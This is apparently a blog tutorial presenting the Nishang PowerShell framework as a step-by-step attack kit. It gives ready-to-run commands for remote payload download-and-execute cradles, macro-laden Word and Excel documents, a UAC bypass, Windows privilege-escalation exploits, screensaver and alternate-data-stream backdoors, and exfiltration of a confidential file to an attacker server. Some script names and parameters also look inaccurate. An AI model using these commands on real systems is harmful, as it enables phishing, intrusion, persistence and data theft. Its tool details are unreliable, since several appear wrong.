Greetings, fellow hackers and security enthusiasts! Today, we’re diving deep into the world of PowerShell and penetration testing with a focus on Nishang. As you all know, PowerShell has become an invaluable tool for ethical hackers and red teams, thanks to its power, flexibility, and the ability to execute code on Windows systems without any additional dependencies.
Nishang is a fantastic collection of PowerShell scripts that helps pen testers and red teams perform various tasks, from reconnaissance and gaining initial access to privilege escalation and maintaining persistence. In this article, we’ll explore Nishang in detail, covering various modules, how to use them, and real-world examples that will surely pique your interest.
Without further ado, let’s get started!
Understanding Nishang
Nishang is an open-source project created by Nikhil Mittal, a well-known security researcher and penetration tester. It is a collection of PowerShell scripts designed for penetration testing and red teaming exercises, focusing on ease of use, stealth, and post-exploitation capabilities. Nishang boasts an extensive range of modules, including reconnaissance, initial access, lateral movement, privilege escalation, persistence, and exfiltration.
The beauty of Nishang lies in its ability to blend seamlessly into the Windows environment, making it less suspicious and less likely to trigger security alerts. This stealthy approach, coupled with its wide array of features, makes Nishang a favorite among penetration testers and red teams.
Setting Up Nishang
Before diving into the exciting world of Nishang, we need to set it up. To download Nishang, simply clone the GitHub repository using the following command:
git clone https://github.com/samratashok/nishang.git
Once the repository has been cloned, navigate to the nishang directory, and you’re good to go. Remember to run PowerShell with administrative privileges to ensure smooth execution of Nishang scripts.
Reconnaissance
Reconnaissance is the first phase of any successful penetration testing or red teaming exercise. In this section, we’ll cover some of Nishang’s reconnaissance scripts.
Get-Information
The Get-Information script is a useful starting point as it gathers various
system details, such as OS version, installed software, running processes, local
users, and more. This information can help you identify potential
vulnerabilities and plan your attack.
To use Get-Information, execute the following command:
Import-Module .\Get-Information.ps1
Get-Information
Get-WebTitle
When targeting web applications, it’s helpful to identify the title of each
webpage to gain a better understanding of the target site’s structure.
Get-WebTitle is a simple Nishang script that allows you to fetch webpage
titles in bulk.
To use Get-WebTitle, execute the following command:
Import-Module .\Get-WebTitle.ps1
Get-WebTitle -URLs "https://www.example.com", "https://www.example2.com"
DNS_TXT_Pwnage
DNS_TXT_Pwnage is a creative script that uses DNS TXT records for data
exfiltration and command execution. This technique is stealthy, as it does not
involve direct communication between the attacker and the target system.
To use DNS_TXT_Pwnage, you must first set up a DNS server to control your
target. Here’s an example of how to use DNS_TXT_Pwnage for command execution:
Import-Module .\DNS_TXT_Pwnage.ps1
Invoke-DNS_TXT_Pwnage -Domain "yourdnsserver.com" -Type CMD
Initial Access
Gaining initial access to the target system is crucial in penetration testing and red teaming exercises. Nishang offers various techniques to achieve this goal.
HTTP-Backdoor
The HTTP-Backdoor script is a powerful initial access tool that uses HTTP
requests to execute commands on the target system. The script listens for
incoming HTTP requests, interprets the commands, and executes them on the target
system.
To use HTTP-Backdoor, follow these steps:
- Set up a web server to host the
HTTP-Backdoor.ps1script. Make sure the server is accessible by the target system. - On the target system, execute the following command:
IEX (New-Object Net.WebClient).DownloadString('http://yourserver/HTTP-Backdoor.ps1') - From your attacking machine, send HTTP requests containing commands to the
target system:
curl http://targetIP/?cmd=whoami
Out-Word
Out-Word is a useful script for creating weaponized Word documents containing
PowerShell payloads. When the target user opens the Word document and enables
macros, the payload is executed, providing initial access to the target system.
To use Out-Word, execute the following command:
Import-Module .\Out-Word.ps1
Out-Word -Payload "IEX (New-Object Net.WebClient).DownloadString('http://yourserver/payload.ps1')" -OutFile "malicious.doc"
Out-Excel
Similar to Out-Word, Out-Excel creates weaponized Excel documents with
embedded PowerShell payloads. The process is nearly identical to that of
Out-Word.
To use Out-Excel, execute the following command:
Import-Module .\Out-Excel.ps1
Out-Excel -Payload "IEX (New-Object Net.WebClient).DownloadString('http://yourserver/payload.ps1')" -OutFile "malicious.xlsx"
Lateral Movement
Once you’ve gained initial access, lateral movement becomes crucial for expanding your foothold in the target environment. Nishang provides several scripts for this purpose.
Invoke-PsUACme
Invoke-PsUACme is a script that bypasses the User Account Control (UAC)
mechanism on the target system, allowing you to execute commands with higher
privileges.
To use Invoke-PsUACme, execute the following command:
Import-Module .\Invoke-PsUACme.ps1
Invoke-PsUACme -Payload "IEX (New-Object Net.WebClient).DownloadString('http://yourserver/payload.ps1')"
Invoke-SSHCommand
Invoke-SSHCommand is a versatile script that enables you to execute commands
on remote systems over SSH. This is particularly useful for lateral movement in
a mixed environment with both Windows and Linux systems.
To use Invoke-SSHCommand, execute the following command:
Import-Module .\Invoke-SSHCommand.ps1
Invoke-SSHCommand -HostName "targetIP" -UserName "username" -Password "password" -Command "whoami"
Privilege Escalation
Privilege escalation is a critical step in gaining full control of the target system. Nishang offers various scripts for this purpose, some of which exploit known vulnerabilities.
Invoke-MS16-032
Invoke-MS16-032 is a script that exploits the MS16-032 vulnerability, a
Windows Secondary Logon Service privilege escalation flaw. Successful
exploitation grants SYSTEM privileges on vulnerable systems.
To use Invoke-MS16-032, execute the following command:
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032
Invoke-MS16-014
Invoke-MS16-014 is another privilege escalation script, targeting the MS16-014
vulnerability, a Windows CSRSS Local Privilege Escalation flaw. Like
Invoke-MS16-032, this script provides SYSTEM privileges on vulnerable systems.
To use Invoke-MS16-014, execute the following command:
Import-Module .\Invoke-MS16-014.ps1
Invoke-MS16-014
Persistence
Maintaining access to the target system is crucial for long-term success in penetration testing and red teaming exercises. Nishang provides several techniques for achieving persistence.
Add-ScrnSaveBackdoor
Add-ScrnSaveBackdoor is a stealthy persistence script that sets a PowerShell
payload as the screensaver on the target system. When the screensaver is
triggered, the payload is executed.
To use Add-ScrnSaveBackdoor, execute the following command:
Import-Module .\Add-ScrnSaveBackdoor.ps1
Add-ScrnSaveBackdoor -Payload "IEX (New-Object Net.WebClient).DownloadString('http://yourserver/payload.ps1')"
Invoke-ADSBackdoor
Invoke-ADSBackdoor is another stealthy persistence technique that leverages
Alternate Data Streams (ADS) to hide PowerShell payloads within existing files
on the target system. The payload is then executed via a scheduled task.
To use Invoke-ADSBackdoor, execute the following command:
Import-Module .\Invoke-ADSBackdoor.ps1
Invoke-ADSBackdoor -Payload "IEX (New-Object Net.WebClient).DownloadString('http://yourserver/payload.ps1')" -TargetFile "C:\Windows\System32\calc.exe"
Exfiltration
Extracting data from the target system is often the ultimate goal of penetration testing and red teaming exercises. Nishang provides several tools for data exfiltration.
Do-Exfiltration
Do-Exfiltration is a flexible script that supports multiple exfiltration
techniques, including HTTP, HTTPS, FTP, and DNS.
To use Do-Exfiltration, execute the following command:
Import-Module .\Do-Exfiltration.ps1
Do-Exfiltration -File "C:\Users\username\Documents\confidential.docx" -Type HTTP -URL "http://yourserver/exfil"
Invoke-FileTransfer
Invoke-FileTransfer is a script that supports file transfers between the
target system and the attacker’s machine, using either HTTP or BITSAdmin.
To use Invoke-FileTransfer, execute the following command:
Import-Module .\Invoke-FileTransfer.ps1
Invoke-FileTransfer -Source "C:\Users\username\Documents\confidential.docx" -Destination "http://yourserver/exfil" -Method HTTP
Conclusion
In this article, we’ve explored Nishang, an invaluable collection of PowerShell scripts designed to assist penetration testers and red teams in their missions. With its wide range of modules and stealthy approach, Nishang has become a go-to tool for many security professionals.
As ethical hackers, it’s essential to stay up-to-date with the latest tools and techniques to ensure we can effectively assess and secure our environments. Nishang is a prime example of the power and flexibility of PowerShell and a testament to the value of open-source projects in the cybersecurity community.
As always, remember to use these tools responsibly and within the boundaries of the law. Happy hacking!